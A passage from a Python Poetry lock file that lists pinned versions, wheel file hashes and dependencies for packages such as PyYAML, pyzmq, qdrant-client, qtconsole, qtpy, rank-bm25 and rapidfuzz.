{file = "PyYAML-6.0.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007"},
{file = "PyYAML-6.0.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab"},
{file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d"},
{file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc"},
{file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673"},
{file = "PyYAML-6.0.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e7d73685e87afe9f3b36c799222440d6cf362062f78be1013661b00c5c6f678b"},
{file = "PyYAML-6.0.1-cp311-cp311-win32.whl", hash = "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741"},
{file = "PyYAML-6.0.1-cp311-cp311-win_amd64.whl", hash = "sha256:bf07ee2fef7014951eeb99f56f39c9bb4af143d8aa3c21b1677805985307da34"},
{file = "PyYAML-6.0.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:855fb52b0dc35af121542a76b9a84f8d1cd886ea97c84703eaa6d88e37a2ad28"},
{file = "PyYAML-6.0.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:40df9b996c2b73138957fe23a16a4f0ba614f4c0efce1e9406a184b6d07fa3a9"},
{file = "PyYAML-6.0.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c22bec3fbe2524cde73d7ada88f6566758a8f7227bfbf93a408a9d86bcc12a0"},
{file = "PyYAML-6.0.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8d4e9c88387b0f5c7d5f281e55304de64cf7f9c0021a3525bd3b1c542da3b0e4"},
{file = "PyYAML-6.0.1-cp312-cp312-win32.whl", hash = "sha256:d483d2cdf104e7c9fa60c544d92981f12ad66a457afae824d146093b8c294c54"},
{file = "PyYAML-6.0.1-cp312-cp312-win_amd64.whl", hash = "sha256:0d3304d8c0adc42be59c5f8a4d9e3d7379e6955ad754aa9d6ab7a398b59dd1df"},
{file = "PyYAML-6.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47"},
{file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98"},
{file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c"},
{file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:afd7e57eddb1a54f0f1a974bc4391af8bcce0b444685d936840f125cf046d5bd"},
{file = "PyYAML-6.0.1-cp36-cp36m-win32.whl", hash = "sha256:fca0e3a251908a499833aa292323f32437106001d436eca0e6e7833256674585"},
{file = "PyYAML-6.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa"},
{file = "PyYAML-6.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b1275ad35a5d18c62a7220633c913e1b42d44b46ee12554e5fd39c70a243d6a3"},
{file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27"},
{file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3"},
{file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:baa90d3f661d43131ca170712d903e6295d1f7a0f595074f151c0aed377c9b9c"},
{file = "PyYAML-6.0.1-cp37-cp37m-win32.whl", hash = "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba"},
{file = "PyYAML-6.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867"},
{file = "PyYAML-6.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1d4c7e777c441b20e32f52bd377e0c409713e8bb1386e1099c2415f26e479595"},
{file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5"},
{file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696"},
{file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735"},
{file = "PyYAML-6.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:49a183be227561de579b4a36efbb21b3eab9651dd81b1858589f796549873dd6"},
{file = "PyYAML-6.0.1-cp38-cp38-win32.whl", hash = "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206"},
{file = "PyYAML-6.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62"},
{file = "PyYAML-6.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8"},
{file = "PyYAML-6.0.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859"},
{file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5773183b6446b2c99bb77e77595dd486303b4faab2b086e7b17bc6bef28865f6"},
{file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b786eecbdf8499b9ca1d697215862083bd6d2a99965554781d0d8d1ad31e13a0"},
{file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc1bf2925a1ecd43da378f4db9e4f799775d6367bdb94671027b73b393a7c42c"},
{file = "PyYAML-6.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:04ac92ad1925b2cff1db0cfebffb6ffc43457495c9b3c39d3fcae417d7125dc5"},
{file = "PyYAML-6.0.1-cp39-cp39-win32.whl", hash = "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c"},
{file = "PyYAML-6.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486"},
{file = "PyYAML-6.0.1.tar.gz", hash = "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43"},
]
[[package]]
name = "pyzmq"
version = "25.1.1"
description = "Python bindings for 0MQ"
optional = false
python-versions = ">=3.6"
files = [
{file = "pyzmq-25.1.1-cp310-cp310-macosx_10_15_universal2.whl", hash = "sha256:381469297409c5adf9a0e884c5eb5186ed33137badcbbb0560b86e910a2f1e76"},
{file = "pyzmq-25.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:955215ed0604dac5b01907424dfa28b40f2b2292d6493445dd34d0dfa72586a8"},
{file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:985bbb1316192b98f32e25e7b9958088431d853ac63aca1d2c236f40afb17c83"},
{file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:afea96f64efa98df4da6958bae37f1cbea7932c35878b185e5982821bc883369"},
{file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:76705c9325d72a81155bb6ab48d4312e0032bf045fb0754889133200f7a0d849"},
{file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:77a41c26205d2353a4c94d02be51d6cbdf63c06fbc1295ea57dad7e2d3381b71"},
{file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:12720a53e61c3b99d87262294e2b375c915fea93c31fc2336898c26d7aed34cd"},
{file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:57459b68e5cd85b0be8184382cefd91959cafe79ae019e6b1ae6e2ba8a12cda7"},
{file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:292fe3fc5ad4a75bc8df0dfaee7d0babe8b1f4ceb596437213821f761b4589f9"},
{file = "pyzmq-25.1.1-cp310-cp310-win32.whl", hash = "sha256:35b5ab8c28978fbbb86ea54958cd89f5176ce747c1fb3d87356cf698048a7790"},
{file = "pyzmq-25.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:11baebdd5fc5b475d484195e49bae2dc64b94a5208f7c89954e9e354fc609d8f"},
{file = "pyzmq-25.1.1-cp311-cp311-macosx_10_15_universal2.whl", hash = "sha256:d20a0ddb3e989e8807d83225a27e5c2eb2260eaa851532086e9e0fa0d5287d83"},
{file = "pyzmq-25.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:e1c1be77bc5fb77d923850f82e55a928f8638f64a61f00ff18a67c7404faf008"},
{file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d89528b4943d27029a2818f847c10c2cecc79fa9590f3cb1860459a5be7933eb"},
{file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:90f26dc6d5f241ba358bef79be9ce06de58d477ca8485e3291675436d3827cf8"},
{file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c2b92812bd214018e50b6380ea3ac0c8bb01ac07fcc14c5f86a5bb25e74026e9"},
{file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:2f957ce63d13c28730f7fd6b72333814221c84ca2421298f66e5143f81c9f91f"},
{file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:047a640f5c9c6ade7b1cc6680a0e28c9dd5a0825135acbd3569cc96ea00b2505"},
{file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:7f7e58effd14b641c5e4dec8c7dab02fb67a13df90329e61c869b9cc607ef752"},
{file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:c2910967e6ab16bf6fbeb1f771c89a7050947221ae12a5b0b60f3bca2ee19bca"},
{file = "pyzmq-25.1.1-cp311-cp311-win32.whl", hash = "sha256:76c1c8efb3ca3a1818b837aea423ff8a07bbf7aafe9f2f6582b61a0458b1a329"},
{file = "pyzmq-25.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:44e58a0554b21fc662f2712814a746635ed668d0fbc98b7cb9d74cb798d202e6"},
{file = "pyzmq-25.1.1-cp312-cp312-macosx_10_15_universal2.whl", hash = "sha256:e1ffa1c924e8c72778b9ccd386a7067cddf626884fd8277f503c48bb5f51c762"},
{file = "pyzmq-25.1.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:1af379b33ef33757224da93e9da62e6471cf4a66d10078cf32bae8127d3d0d4a"},
{file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cff084c6933680d1f8b2f3b4ff5bbb88538a4aac00d199ac13f49d0698727ecb"},
{file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e2400a94f7dd9cb20cd012951a0cbf8249e3d554c63a9c0cdfd5cbb6c01d2dec"},
{file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2d81f1ddae3858b8299d1da72dd7d19dd36aab654c19671aa8a7e7fb02f6638a"},
{file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:255ca2b219f9e5a3a9ef3081512e1358bd4760ce77828e1028b818ff5610b87b"},
{file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:a882ac0a351288dd18ecae3326b8a49d10c61a68b01419f3a0b9a306190baf69"},
{file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:724c292bb26365659fc434e9567b3f1adbdb5e8d640c936ed901f49e03e5d32e"},
{file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:4ca1ed0bb2d850aa8471387882247c68f1e62a4af0ce9c8a1dbe0d2bf69e41fb"},
{file = "pyzmq-25.1.1-cp312-cp312-win32.whl", hash = "sha256:b3451108ab861040754fa5208bca4a5496c65875710f76789a9ad27c801a0075"},
{file = "pyzmq-25.1.1-cp312-cp312-win_amd64.whl", hash = "sha256:eadbefd5e92ef8a345f0525b5cfd01cf4e4cc651a2cffb8f23c0dd184975d787"},
{file = "pyzmq-25.1.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:db0b2af416ba735c6304c47f75d348f498b92952f5e3e8bff449336d2728795d"},
{file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c7c133e93b405eb0d36fa430c94185bdd13c36204a8635470cccc200723c13bb"},
{file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:273bc3959bcbff3f48606b28229b4721716598d76b5aaea2b4a9d0ab454ec062"},
{file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cbc8df5c6a88ba5ae385d8930da02201165408dde8d8322072e3e5ddd4f68e22"},
{file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:18d43df3f2302d836f2a56f17e5663e398416e9dd74b205b179065e61f1a6edf"},
{file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:73461eed88a88c866656e08f89299720a38cb4e9d34ae6bf5df6f71102570f2e"},
{file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:34c850ce7976d19ebe7b9d4b9bb8c9dfc7aac336c0958e2651b88cbd46682123"},
{file = "pyzmq-25.1.1-cp36-cp36m-win32.whl", hash = "sha256:d2045d6d9439a0078f2a34b57c7b18c4a6aef0bee37f22e4ec9f32456c852c71"},
{file = "pyzmq-25.1.1-cp36-cp36m-win_amd64.whl", hash = "sha256:458dea649f2f02a0b244ae6aef8dc29325a2810aa26b07af8374dc2a9faf57e3"},
{file = "pyzmq-25.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7cff25c5b315e63b07a36f0c2bab32c58eafbe57d0dce61b614ef4c76058c115"},
{file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b1579413ae492b05de5a6174574f8c44c2b9b122a42015c5292afa4be2507f28"},
{file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3d0a409d3b28607cc427aa5c30a6f1e4452cc44e311f843e05edb28ab5e36da0"},
{file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:21eb4e609a154a57c520e3d5bfa0d97e49b6872ea057b7c85257b11e78068222"},
{file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:034239843541ef7a1aee0c7b2cb7f6aafffb005ede965ae9cbd49d5ff4ff73cf"},
{file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f8115e303280ba09f3898194791a153862cbf9eef722ad8f7f741987ee2a97c7"},
{file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:1a5d26fe8f32f137e784f768143728438877d69a586ddeaad898558dc971a5ae"},
{file = "pyzmq-25.1.1-cp37-cp37m-win32.whl", hash = "sha256:f32260e556a983bc5c7ed588d04c942c9a8f9c2e99213fec11a031e316874c7e"},
{file = "pyzmq-25.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:abf34e43c531bbb510ae7e8f5b2b1f2a8ab93219510e2b287a944432fad135f3"},
{file = "pyzmq-25.1.1-cp38-cp38-macosx_10_15_universal2.whl", hash = "sha256:87e34f31ca8f168c56d6fbf99692cc8d3b445abb5bfd08c229ae992d7547a92a"},
{file = "pyzmq-25.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c9c6c9b2c2f80747a98f34ef491c4d7b1a8d4853937bb1492774992a120f475d"},
{file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5619f3f5a4db5dbb572b095ea3cb5cc035335159d9da950830c9c4db2fbb6995"},
{file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:5a34d2395073ef862b4032343cf0c32a712f3ab49d7ec4f42c9661e0294d106f"},
{file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:25f0e6b78220aba09815cd1f3a32b9c7cb3e02cb846d1cfc526b6595f6046618"},
{file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3669cf8ee3520c2f13b2e0351c41fea919852b220988d2049249db10046a7afb"},
{file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:2d163a18819277e49911f7461567bda923461c50b19d169a062536fffe7cd9d2"},
{file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:df27ffddff4190667d40de7beba4a950b5ce78fe28a7dcc41d6f8a700a80a3c0"},
{file = "pyzmq-25.1.1-cp38-cp38-win32.whl", hash = "sha256:a382372898a07479bd34bda781008e4a954ed8750f17891e794521c3e21c2e1c"},
{file = "pyzmq-25.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:52533489f28d62eb1258a965f2aba28a82aa747202c8fa5a1c7a43b5db0e85c1"},
{file = "pyzmq-25.1.1-cp39-cp39-macosx_10_15_universal2.whl", hash = "sha256:03b3f49b57264909aacd0741892f2aecf2f51fb053e7d8ac6767f6c700832f45"},
{file = "pyzmq-25.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:330f9e188d0d89080cde66dc7470f57d1926ff2fb5576227f14d5be7ab30b9fa"},
{file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:2ca57a5be0389f2a65e6d3bb2962a971688cbdd30b4c0bd188c99e39c234f414"},
{file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d457aed310f2670f59cc5b57dcfced452aeeed77f9da2b9763616bd57e4dbaae"},
{file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c56d748ea50215abef7030c72b60dd723ed5b5c7e65e7bc2504e77843631c1a6"},
{file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:8f03d3f0d01cb5a018debeb412441996a517b11c5c17ab2001aa0597c6d6882c"},
{file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:820c4a08195a681252f46926de10e29b6bbf3e17b30037bd4250d72dd3ddaab8"},
{file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:17ef5f01d25b67ca8f98120d5fa1d21efe9611604e8eb03a5147360f517dd1e2"},
{file = "pyzmq-25.1.1-cp39-cp39-win32.whl", hash = "sha256:04ccbed567171579ec2cebb9c8a3e30801723c575601f9a990ab25bcac6b51e2"},
{file = "pyzmq-25.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:e61f091c3ba0c3578411ef505992d356a812fb200643eab27f4f70eed34a29ef"},
{file = "pyzmq-25.1.1-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ade6d25bb29c4555d718ac6d1443a7386595528c33d6b133b258f65f963bb0f6"},
{file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e0c95ddd4f6e9fca4e9e3afaa4f9df8552f0ba5d1004e89ef0a68e1f1f9807c7"},
{file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:48e466162a24daf86f6b5ca72444d2bf39a5e58da5f96370078be67c67adc978"},
{file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:abc719161780932c4e11aaebb203be3d6acc6b38d2f26c0f523b5b59d2fc1996"},
{file = "pyzmq-25.1.1-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:1ccf825981640b8c34ae54231b7ed00271822ea1c6d8ba1090ebd4943759abf5"},
{file = "pyzmq-25.1.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c2f20ce161ebdb0091a10c9ca0372e023ce24980d0e1f810f519da6f79c60800"},
{file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:deee9ca4727f53464daf089536e68b13e6104e84a37820a88b0a057b97bba2d2"},
{file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:aa8d6cdc8b8aa19ceb319aaa2b660cdaccc533ec477eeb1309e2a291eaacc43a"},
{file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:019e59ef5c5256a2c7378f2fb8560fc2a9ff1d315755204295b2eab96b254d0a"},
{file = "pyzmq-25.1.1-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:b9af3757495c1ee3b5c4e945c1df7be95562277c6e5bccc20a39aec50f826cd0"},
{file = "pyzmq-25.1.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:548d6482dc8aadbe7e79d1b5806585c8120bafa1ef841167bc9090522b610fa6"},
{file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:057e824b2aae50accc0f9a0570998adc021b372478a921506fddd6c02e60308e"},
{file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2243700cc5548cff20963f0ca92d3e5e436394375ab8a354bbea2b12911b20b0"},
{file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79986f3b4af059777111409ee517da24a529bdbd46da578b33f25580adcff728"},
{file = "pyzmq-25.1.1-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:11d58723d44d6ed4dd677c5615b2ffb19d5c426636345567d6af82be4dff8a55"},
{file = "pyzmq-25.1.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:49d238cf4b69652257db66d0c623cd3e09b5d2e9576b56bc067a396133a00d4a"},
{file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fedbdc753827cf014c01dbbee9c3be17e5a208dcd1bf8641ce2cd29580d1f0d4"},
{file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bc16ac425cc927d0a57d242589f87ee093884ea4804c05a13834d07c20db203c"},
{file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11c1d2aed9079c6b0c9550a7257a836b4a637feb334904610f06d70eb44c56d2"},
{file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:e8a701123029cc240cea61dd2d16ad57cab4691804143ce80ecd9286b464d180"},
{file = "pyzmq-25.1.1-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:61706a6b6c24bdece85ff177fec393545a3191eeda35b07aaa1458a027ad1304"},
{file = "pyzmq-25.1.1.tar.gz", hash = "sha256:259c22485b71abacdfa8bf79720cd7bcf4b9d128b30ea554f01ae71fdbfdaa23"},
]
[package.dependencies]
cffi = {version = "*", markers = "implementation_name == \"pypy\""}
[[package]]
name = "qdrant-client"
version = "1.6.4"
description = "Client library for the Qdrant vector search engine"
optional = true
python-versions = ">=3.8,<3.13"
files = [
{file = "qdrant_client-1.6.4-py3-none-any.whl", hash = "sha256:db4696978d6a62d78ff60f70b912383f1e467bda3053f732b01ddb5f93281b10"},
{file = "qdrant_client-1.6.4.tar.gz", hash = "sha256:bbd65f383b6a55a9ccf4e301250fa925179340dd90cfde9b93ce4230fd68867b"},
]
[package.dependencies]
grpcio = ">=1.41.0"
grpcio-tools = ">=1.41.0"
httpx = {version = ">=0.14.0", extras = ["http2"]}
numpy = {version = ">=1.21", markers = "python_version >= \"3.8\" and python_version < \"3.12\""}
portalocker = ">=2.7.0,<3.0.0"
pydantic = ">=1.10.8"
urllib3 = ">=1.26.14,<2.0.0"
[package.extras]
fastembed = ["fastembed (==0.1.1)"]
[[package]]
name = "qtconsole"
version = "5.4.4"
description = "Jupyter Qt console"
optional = false
python-versions = ">= 3.7"
files = [
{file = "qtconsole-5.4.4-py3-none-any.whl", hash = "sha256:a3b69b868e041c2c698bdc75b0602f42e130ffb256d6efa48f9aa756c97672aa"},
{file = "qtconsole-5.4.4.tar.gz", hash = "sha256:b7ffb53d74f23cee29f4cdb55dd6fabc8ec312d94f3c46ba38e1dde458693dfb"},
]
[package.dependencies]
ipykernel = ">=4.1"
ipython-genutils = "*"
jupyter-client = ">=4.1"
jupyter-core = "*"
packaging = "*"
pygments = "*"
pyzmq = ">=17.1"
qtpy = ">=2.4.0"
traitlets = "<5.2.1 || >5.2.1,<5.2.2 || >5.2.2"
[package.extras]
doc = ["Sphinx (>=1.3)"]
test = ["flaky", "pytest", "pytest-qt"]
[[package]]
name = "qtpy"
version = "2.4.1"
description = "Provides an abstraction layer on top of the various Qt bindings (PyQt5/6 and PySide2/6)."
optional = false
python-versions = ">=3.7"
files = [
{file = "QtPy-2.4.1-py3-none-any.whl", hash = "sha256:1c1d8c4fa2c884ae742b069151b0abe15b3f70491f3972698c683b8e38de839b"},
{file = "QtPy-2.4.1.tar.gz", hash = "sha256:a5a15ffd519550a1361bdc56ffc07fda56a6af7292f17c7b395d4083af632987"},
]
[package.dependencies]
packaging = "*"
[package.extras]
test = ["pytest (>=6,!=7.0.0,!=7.0.1)", "pytest-cov (>=3.0.0)", "pytest-qt"]
[[package]]
name = "rank-bm25"
version = "0.2.2"
description = "Various BM25 algorithms for document ranking"
optional = true
python-versions = "*"
files = [
{file = "rank_bm25-0.2.2-py3-none-any.whl", hash = "sha256:7bd4a95571adadfc271746fa146a4bcfd89c0cf731e49c3d1ad863290adbe8ae"},
{file = "rank_bm25-0.2.2.tar.gz", hash = "sha256:096ccef76f8188563419aaf384a02f0ea459503fdf77901378d4fd9d87e5e51d"},
]
[package.dependencies]
numpy = "*"
[package.extras]
dev = ["pytest"]
[[package]]
name = "rapidfuzz"
version = "3.4.0"
description = "rapid fuzzy string matching"
optional = true
python-versions = ">=3.7"
files = [
{file = "rapidfuzz-3.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:1438e68fe8869fe6819a313140e98641b34bfc89234b82486d8fd02044a067e8"},
{file = "rapidfuzz-3.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:59f851c7a54a9652b9598553547e0940244bfce7c9b672bac728efa0b9028d03"},
{file = "rapidfuzz-3.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6286510910fcd649471a7f5b77fcc971e673729e7c84216dbf321bead580d5a1"},
{file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87409e12f9a82aa33a5b845c49dd8d5d4264f2f171f0a69ddc638e100fcc50de"},
